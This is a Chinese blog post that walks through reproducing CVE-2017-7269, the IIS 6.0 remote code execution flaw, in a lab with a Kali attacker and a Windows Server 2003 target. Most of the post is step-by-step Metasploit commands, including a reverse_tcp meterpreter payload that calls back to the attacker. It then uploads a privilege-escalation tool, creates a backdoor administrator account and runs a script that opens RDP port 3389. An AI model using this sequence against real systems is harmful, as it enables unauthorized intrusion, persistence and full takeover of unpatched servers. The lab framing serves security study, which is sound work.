bat 远程复制文件_iis6.0远程代码执行漏洞复现(CVE20177269)

本文介绍了如何复现并利用CVE-2017-7269漏洞进行远程代码执行。通过在Windows Server 2003 R2上的IIS6.0设置,利用Metasploit框架的模块,逐步设置参数并执行攻击。在获得一般用户权限后,通过上传和执行提权工具,最终达到系统权限,并开启目标机的3389端口,实现远程桌面连接。
摘要由CSDN通过智能技术生成

一.实验环境搭建

1.目标机:windows server 2003 r2

2.iis配置

目标机ip:192.168.0.102

二.攻击机器

一台kai liunx     ip:192.168.0.131

三.开始攻击

下载攻击exp,地址:

exp:https://github.com/zcgonvh/cve-2017-7269

1.把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下

2.打开Metasploit

3.输入use命令,use exploit/windows/iis/cve-2017-7269

4.使用命令show options

5.设置目标机ip,set RHOST 192.168.0.102

6.设置对面网站,set HttpHost 192.168.0.102

7.设置返回载荷,set payload windows/meterpreter/reverse_tcp

8.设置攻击机ip,set LHOST 192.168.0.131

9.进行溢出,exploit

10.如果出现错误Exploit completed, but no session was created,有可能是攻击的过多,可以尝试重启,实在不行就恢复快照

11.输入shell命令,来到了我们所熟悉的界面

12.查看当前用户权限,whoami,发现只是个一般用户权限

13.cd到c盘

14.来到c盘根目录,mkdir 123,进行新建文件夹,发现创建成功(实际情况不会这么简单,只能手工寻找权限较低的目录)

14.按Ctrl + C退出shell,输出y

15.利用Metasploit的上传功能,把提权工具pr1.exe上传到刚刚新建的文件里

16.又回到shell里面确定工具上传是否成功

17.利用工具进行提权,命令:pr1.exe "whoami",已经是system权限了

18.进行新建用户,pr1.exe "net user wcy wcy /add"

19.添加用户到管理员,pr1.exe "net localhost administrators wcy /add"

20.查看远程连接是否打开,没有打开,命令:netstat -an

21.再上传一个开3389.bat,利用pr1.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面pr1.exe上传方法一样)

命令:iis6.exe "3389.bat"

23.进行远程连接,本地cmd输入命令:mstsc

24.利用之前新建的管理员成功登录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值